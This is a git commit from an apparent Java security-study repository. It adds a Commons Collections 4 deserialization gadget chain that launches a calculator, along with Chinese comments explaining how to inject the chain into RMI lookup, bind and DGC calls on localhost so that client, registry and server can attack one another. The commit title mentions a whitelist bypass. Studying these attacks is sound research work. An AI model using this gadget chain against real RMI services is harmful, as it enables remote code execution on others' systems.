feat:完善rmi测试，通过debug方式，完成各端互打(PS:121版本后存在白名单，需绕过)

threedr3am · threedr3am · commit 209cd197f11f · 2020-02-25T16:20:07.000+08:00
diff --git a/rmi/pom.xml b/rmi/pom.xml
@@ -32,4 +32,34 @@
       <version>3.25.0-GA</version>
     </dependency>
   </dependencies>
+
+  <build>
+    <plugins>
+
+      <plugin>
+        <groupId>org.apache.maven.plugins</groupId>
+        <artifactId>maven-assembly-plugin</artifactId>
+        <configuration>
+          <archive>
+            <manifest>
+              <mainClass>com.threedr3am.bug.rmi.client.RMIClient</mainClass>
+            </manifest>
+          </archive>
+          <descriptorRefs>
+            <descriptorRef>jar-with-dependencies</descriptorRef>
+          </descriptorRefs>
+          <attach>false</attach>
+        </configuration>
+        <executions>
+          <execution>
+            <id>make-assembly</id>
+            <phase>package</phase>
+            <goals>
+              <goal>single</goal>
+            </goals>
+          </execution>
+        </executions>
+      </plugin>
+    </plugins>
+  </build>
 </project>
diff --git a/rmi/src/main/java/com/threedr3am/bug/rmi/CommonCollections4.java b/rmi/src/main/java/com/threedr3am/bug/rmi/CommonCollections4.java
@@ -0,0 +1,33 @@
+package com.threedr3am.bug.rmi;
+
+import com.threedr3am.bug.common.utils.Reflections;
+import com.threedr3am.bug.rmi.utils.Gadgets;
+import org.apache.commons.collections4.bag.TreeBag;
+import org.apache.commons.collections4.comparators.TransformingComparator;
+import org.apache.commons.collections4.functors.InvokerTransformer;
+
+/**
+ * @author threedr3am
+ */
+public class CommonCollections4 {
+
+  public static Object getPayload() throws Exception {
+    Object templates = Gadgets.createTemplatesImpl("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
+
+    // setup harmless chain
+    final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
+
+    // define the comparator used for sorting
+    TransformingComparator comp = new TransformingComparator(transformer);
+
+    // prepare CommonsCollections object entry point
+    TreeBag tree = new TreeBag(comp);
+    tree.add(templates);
+
+    // arm transformer
+    Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
+
+    return tree;
+  }
+
+}
diff --git a/rmi/src/main/java/com/threedr3am/bug/rmi/client/RMIClient.java b/rmi/src/main/java/com/threedr3am/bug/rmi/client/RMIClient.java
@@ -15,6 +15,45 @@ public static void main(String[] args) {
     try {
       Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);
       HelloService helloService = (HelloService) registry.lookup("hello");
+      /**
+       * todo lookup打registry
+       * 在不了解通讯协议的情况下，想要通过客户端执行lookup打registry，可以先把payload生成类和相关依赖打包成jar包，
+       * 或者一个class目录，通过jvm启动参数追加其到bootclasspath（因为在stub内，当前类加载器是bootstrap加载器，没办法加载到classpath路径的类）
+       * -Xbootclasspath/a:/Users/xuanyonghao/security/java/my-project/learnjavabug/rmi/target/rmi-1.0-SNAPSHOT-jar-with-dependencies.jar
+       * 然后debug到
+       *
+       * lookup:115, RegistryImpl_Stub (sun.rmi.registry)
+       * main:17, RMIClient (com.threedr3am.bug.rmi.client)
+       *
+       * 直接debug模式下调用writeObject，参数换成我们的恶意payload
+       * 例：
+       * Class c = ClassLoader.getSystemClassLoader().loadClass("com/threedr3am/bug/rmi/CommonCollections4".replace("/","."));
+       * Method method = c.getMethods()[0];
+       * Object o = method.invoke(null,null);
+       * var3.writeObject(o);
+       *
+      * */
+
+
+      /**
+       * todo 客户端打服务端，也是按照上述类似，debug到lookup取到registry返回的stub后，使用dgcclient和服务端连接上
+       *
+       * dirty:105, DGCImpl_Stub (sun.rmi.transport)
+       * makeDirtyCall:382, DGCClient$EndpointEntry (sun.rmi.transport)
+       * registerRefs:324, DGCClient$EndpointEntry (sun.rmi.transport)
+       * registerRefs:160, DGCClient (sun.rmi.transport)
+       * registerRefs:102, ConnectionInputStream (sun.rmi.transport)
+       * releaseInputStream:157, StreamRemoteCall (sun.rmi.transport)
+       * done:320, StreamRemoteCall (sun.rmi.transport)
+       * done:447, UnicastRef (sun.rmi.server)
+       * lookup:129, RegistryImpl_Stub (sun.rmi.registry)
+       * main:17, RMIClient (com.threedr3am.bug.rmi.client)
+       *
+       * Class c = ClassLoader.getSystemClassLoader().loadClass("com/threedr3am/bug/rmi/CommonCollections4".replace("/","."));
+       * Method method = c.getMethods()[0];
+       * Object o = method.invoke(null,null);
+       * var6.getOutputStream().writeObject(o);
+       * */
       System.out.println(helloService.sayHello());
     } catch (RemoteException e) {
       e.printStackTrace();
diff --git a/rmi/src/main/java/com/threedr3am/bug/rmi/registry/RMIRegistry.java b/rmi/src/main/java/com/threedr3am/bug/rmi/registry/RMIRegistry.java
@@ -11,6 +11,53 @@ public class RMIRegistry {
 
   public static void main(String[] args) throws RemoteException {
     Registry registry = LocateRegistry.createRegistry(1099);
+    /**
+     * todo 看完客户端lookup打registry，也能看到lookup内部执行了readObject，那么，相应的在registry打断点，writeObject恶意类就可以打客户端
+     *
+     * writeObject:343, ObjectOutputStream (java.io)
+     * dispatch:118, RegistryImpl_Skel (sun.rmi.registry)
+     * oldDispatch:468, UnicastServerRef (sun.rmi.server)
+     * dispatch:300, UnicastServerRef (sun.rmi.server)
+     * run:200, Transport$1 (sun.rmi.transport)
+     * run:197, Transport$1 (sun.rmi.transport)
+     * doPrivileged:-1, AccessController (java.security)
+     * serviceCall:196, Transport (sun.rmi.transport)
+     * handleMessages:573, TCPTransport (sun.rmi.transport.tcp)
+     * run0:834, TCPTransport$ConnectionHandler (sun.rmi.transport.tcp)
+     * lambda$run$0:688, TCPTransport$ConnectionHandler (sun.rmi.transport.tcp)
+     * run:-1, 568523217 (sun.rmi.transport.tcp.TCPTransport$ConnectionHandler$$Lambda$5)
+     * doPrivileged:-1, AccessController (java.security)
+     * run:687, TCPTransport$ConnectionHandler (sun.rmi.transport.tcp)
+     * runWorker:1149, ThreadPoolExecutor (java.util.concurrent)
+     * run:624, ThreadPoolExecutor$Worker (java.util.concurrent)
+     * run:748, Thread (java.lang)
+     *
+     * todo 因为服务端bind它的stub到registry的时候，也会有序列化数据通讯，所以registry也能被动的打服务端
+     *
+     * writeObject:348, ObjectOutputStream (java.io)
+     * dirty:105, DGCImpl_Stub (sun.rmi.transport)
+     * makeDirtyCall:382, DGCClient$EndpointEntry (sun.rmi.transport)
+     * registerRefs:324, DGCClient$EndpointEntry (sun.rmi.transport)
+     * registerRefs:160, DGCClient (sun.rmi.transport)
+     * registerRefs:102, ConnectionInputStream (sun.rmi.transport)
+     * releaseInputStream:157, StreamRemoteCall (sun.rmi.transport)
+     * dispatch:80, RegistryImpl_Skel (sun.rmi.registry)
+     * oldDispatch:468, UnicastServerRef (sun.rmi.server)
+     * dispatch:300, UnicastServerRef (sun.rmi.server)
+     * run:200, Transport$1 (sun.rmi.transport)
+     * run:197, Transport$1 (sun.rmi.transport)
+     * doPrivileged:-1, AccessController (java.security)
+     * serviceCall:196, Transport (sun.rmi.transport)
+     * handleMessages:573, TCPTransport (sun.rmi.transport.tcp)
+     * run0:834, TCPTransport$ConnectionHandler (sun.rmi.transport.tcp)
+     * lambda$run$0:688, TCPTransport$ConnectionHandler (sun.rmi.transport.tcp)
+     * run:-1, 568523217 (sun.rmi.transport.tcp.TCPTransport$ConnectionHandler$$Lambda$5)
+     * doPrivileged:-1, AccessController (java.security)
+     * run:687, TCPTransport$ConnectionHandler (sun.rmi.transport.tcp)
+     * runWorker:1149, ThreadPoolExecutor (java.util.concurrent)
+     * run:624, ThreadPoolExecutor$Worker (java.util.concurrent)
+     * run:748, Thread (java.lang)
+     */
     while (true);
   }
 }
diff --git a/rmi/src/main/java/com/threedr3am/bug/rmi/server/RMIServer.java b/rmi/src/main/java/com/threedr3am/bug/rmi/server/RMIServer.java
@@ -17,7 +17,39 @@ public static void main(String[] args) {
       HelloService helloService = new HelloServiceImpl();
       Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);
       registry.bind("hello", helloService);
-    } catch (AlreadyBoundException | RemoteException e) {
+      /**
+       * todo all in java serialization，客户端能打服务端，服务端利用返回值也能打客户端，服务端不但能被动打客户端，也能主动bind打registry
+       *
+       * 打registry（可以选择bind打，也能debug打）：
+       *
+       * rebind:151, RegistryImpl_Stub (sun.rmi.registry)
+       * main:19, RMIServer (com.threedr3am.bug.rmi.server)
+       *
+       * bind:63, RegistryImpl_Stub (sun.rmi.registry)
+       * main:19, RMIServer (com.threedr3am.bug.rmi.server)
+       *
+       * 打客户端：
+       *
+       * writeObject:343, ObjectOutputStream (java.io)
+       * dispatch:101, DGCImpl_Skel (sun.rmi.transport)
+       * oldDispatch:468, UnicastServerRef (sun.rmi.server)
+       * dispatch:300, UnicastServerRef (sun.rmi.server)
+       * run:200, Transport$1 (sun.rmi.transport)
+       * run:197, Transport$1 (sun.rmi.transport)
+       * doPrivileged:-1, AccessController (java.security)
+       * serviceCall:196, Transport (sun.rmi.transport)
+       * handleMessages:573, TCPTransport (sun.rmi.transport.tcp)
+       * run0:834, TCPTransport$ConnectionHandler (sun.rmi.transport.tcp)
+       * lambda$run$0:688, TCPTransport$ConnectionHandler (sun.rmi.transport.tcp)
+       * run:-1, 592642572 (sun.rmi.transport.tcp.TCPTransport$ConnectionHandler$$Lambda$3)
+       * doPrivileged:-1, AccessController (java.security)
+       * run:687, TCPTransport$ConnectionHandler (sun.rmi.transport.tcp)
+       * runWorker:1149, ThreadPoolExecutor (java.util.concurrent)
+       * run:624, ThreadPoolExecutor$Worker (java.util.concurrent)
+       * run:748, Thread (java.lang)
+       *
+       */
+    } catch (RemoteException | AlreadyBoundException e) {
       e.printStackTrace();
     }
   }
diff --git a/rmi/src/main/java/com/threedr3am/bug/rmi/support/ClassFiles.java b/rmi/src/main/java/com/threedr3am/bug/rmi/support/ClassFiles.java
@@ -0,0 +1,52 @@
+package com.threedr3am.bug.rmi.support;
+
+
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+
+
+public class ClassFiles {
+
+    public static String classAsFile ( final Class<?> clazz ) {
+        return classAsFile(clazz, true);
+    }
+
+
+    public static String classAsFile ( final Class<?> clazz, boolean suffix ) {
+        String str;
+        if ( clazz.getEnclosingClass() == null ) {
+            str = clazz.getName().replace(".", "/");
+        }
+        else {
+            str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName();
+        }
+        if ( suffix ) {
+            str += ".class";
+        }
+        return str;
+    }
+
+
+    @SuppressWarnings ( "resource" )
+    public static byte[] classAsBytes ( final Class<?> clazz ) {
+        try {
+            final byte[] buffer = new byte[1024];
+            final String file = classAsFile(clazz);
+            final InputStream in = ClassFiles.class.getClassLoader().getResourceAsStream(file);
+            if ( in == null ) {
+                throw new IOException("couldn't find '" + file + "'");
+            }
+            final ByteArrayOutputStream out = new ByteArrayOutputStream();
+            int len;
+            while ( ( len = in.read(buffer) ) != -1 ) {
+                out.write(buffer, 0, len);
+            }
+            return out.toByteArray();
+        }
+        catch ( IOException e ) {
+            throw new RuntimeException(e);
+        }
+    }
+
+}
diff --git a/rmi/src/main/java/com/threedr3am/bug/rmi/utils/Gadgets.java b/rmi/src/main/java/com/threedr3am/bug/rmi/utils/Gadgets.java
@@ -10,8 +10,7 @@
 import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
 import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
 import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
-import com.threedr3am.bug.common.support.ClassFiles;
-import com.threedr3am.bug.common.utils.Reflections;
+import com.threedr3am.bug.rmi.support.ClassFiles;
 import java.io.Serializable;
 import java.lang.reflect.Array;
 import java.lang.reflect.Constructor;
diff --git a/rmi/src/main/java/com/threedr3am/bug/rmi/utils/Reflections.java b/rmi/src/main/java/com/threedr3am/bug/rmi/utils/Reflections.java
@@ -0,0 +1,68 @@
+package com.threedr3am.bug.rmi.utils;
+
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationTargetException;
+import sun.reflect.ReflectionFactory;
+
+
+@SuppressWarnings ( "restriction" )
+public class Reflections {
+
+    public static Field getField ( final Class<?> clazz, final String fieldName ) throws Exception {
+        try {
+            Field field = clazz.getDeclaredField(fieldName);
+            if ( field != null )
+                field.setAccessible(true);
+            else if ( clazz.getSuperclass() != null )
+                field = getField(clazz.getSuperclass(), fieldName);
+
+            return field;
+        }
+        catch ( NoSuchFieldException e ) {
+            if ( !clazz.getSuperclass().equals(Object.class) ) {
+                return getField(clazz.getSuperclass(), fieldName);
+            }
+            throw e;
+        }
+    }
+
+
+    public static void setFieldValue ( final Object obj, final String fieldName, final Object value ) throws Exception {
+        final Field field = getField(obj.getClass(), fieldName);
+        field.set(obj, value);
+    }
+
+
+    public static Object getFieldValue ( final Object obj, final String fieldName ) throws Exception {
+        final Field field = getField(obj.getClass(), fieldName);
+        return field.get(obj);
+    }
+
+
+    public static Constructor<?> getFirstCtor ( final String name ) throws Exception {
+        final Constructor<?> ctor = Class.forName(name).getDeclaredConstructors()[ 0 ];
+        ctor.setAccessible(true);
+        return ctor;
+    }
+
+
+    public static <T> T createWithoutConstructor ( Class<T> classToInstantiate )
+            throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
+        return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]);
+    }
+
+
+    @SuppressWarnings ( {
+        "unchecked"
+    } )
+    public static <T> T createWithConstructor ( Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes,
+            Object[] consArgs ) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
+        Constructor<? super T> objCons = constructorClass.getDeclaredConstructor(consArgTypes);
+        objCons.setAccessible(true);
+        Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);
+        sc.setAccessible(true);
+        return (T) sc.newInstance(consArgs);
+    }
+
+}
